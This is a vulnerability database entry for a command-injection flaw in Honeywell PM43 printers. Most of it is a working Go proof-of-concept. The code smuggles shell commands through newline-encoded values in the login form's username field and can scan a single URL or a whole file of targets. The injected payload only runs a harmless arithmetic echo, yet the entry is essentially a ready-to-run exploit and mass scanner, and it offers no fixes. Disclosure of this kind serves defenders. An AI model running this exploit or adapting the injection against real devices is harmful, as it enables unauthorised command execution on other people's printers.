PM43 命令执行漏洞

Basic Fields

SSV ID:: SSV-99710

Find Time:: Unknown

Submit Time:: 2023-07-03

Level:

Category:: 命令执行

Component:: honeywell PM43
(version <=P10.11.013310)

Author:: Unknown

Submitter:: Knownsec

CVE-ID：: Add

CNNVD-ID：: Add

CNVD-ID：: Add

ZoomEye Dork：: Add

Source

https://github.com/R0OtAdm1n/pm43-username-rce-poc

Detail

Contributor Got 0KB

Unopen

have 0 exchange

PoC (非 pocsuite 插件)

Contributor Knownsec totally have 0KB

package main import ( "bufio" "flag" "fmt" "math/rand" "net/http" "os" "strings" "time" "github.com/fatih/color" ) func main() { var targetURL string var inputFile string flag.StringVar(&targetURL, "url", "", "Target URL") flag.StringVar(&inputFile, "file", "", "Input file containing URLs") flag.Parse() if targetURL != "" { fmt.Printf("[*] Testing single URL: %s\n", targetURL) testURL(targetURL) } else if inputFile != "" { fmt.Printf("[*] Testing URLs from file: %s\n", inputFile) testURLsFromFile(inputFile) } else { fmt.Println("[-] Please provide either a target URL or an input file") return } } func testURL(urlStr string) { rand.Seed(time.Now().UnixNano()) num := rand.Intn(90001) + 10000 payload := fmt.Sprintf(`POC%%0Aecho -e "\n";expr %d \* 2;echo -e "\n"%%0A`, num) data := fmt.Sprintf("username=%s&userpassword=sample_password&login=Login", payload) loadfileURL := urlStr + "/loadfile.lp?pageid=Home" resp, err := http.Post(loadfileURL, "application/x-www-form-urlencoded", strings.NewReader(data)) if err != nil { fmt.Println("[-] Request failed:", err) return } defer resp.Body.Close() if resp.StatusCode == http.StatusOK { scanner := bufio.NewScanner(resp.Body) for scanner.Scan() { line := scanner.Text() if strings.Contains(line, fmt.Sprintf("%d", num*2)) { printSuccess("[+] Command Injection Vulnerability Detected!") fmt.Printf("[*] Payload: %s\n", payload) return } } } printFailure("[-] Command Injection Vulnerability Not Detected.") } func testURLsFromFile(filename string) { file, err := os.Open(filename) if err != nil { fmt.Println("[-] Failed to open file:", err) return } defer file.Close() scanner := bufio.NewScanner(file) for scanner.Scan() { url := scanner.Text() fmt.Println("[*] Testing URL:", url) testURL(url) } if err := scanner.Err(); err != nil { fmt.Println("[-] Error reading file:", err) } } // PrintSuccess prints text in green color with bold style func printSuccess(text string) { color.New(color.FgGreen, color.Bold).Println(text) } // PrintFailure prints text in red color with bold style func printFailure(text string) { color.New(color.FgRed, color.Bold).Println(text) }

have 0 Exchange

Reference Linking

Solutions

Temp Solutions

Unavailable Temp Solutions

Official Solution

Unavailable Official solution

Defense Solutions

Unavailable Defense Solutions

Timeline

发现/披露了漏洞
Knownsec

2023-07-03 提交了漏洞
Knownsec

2024-03-13 提交更新了 PoC
Knownsec

2024-03-13 提交更新了 PoC

Related Vuls

PM43 命令执行漏洞

※Any content provided by this site, only to learn the code and services, not for illegal purposes

Basic Fields

Source

Detail

PoC (非 pocsuite 插件)

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

PM43 命令执行漏洞

Basic Fields

Source

Detail

PoC (非 pocsuite 插件)

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

Hello,

Hello,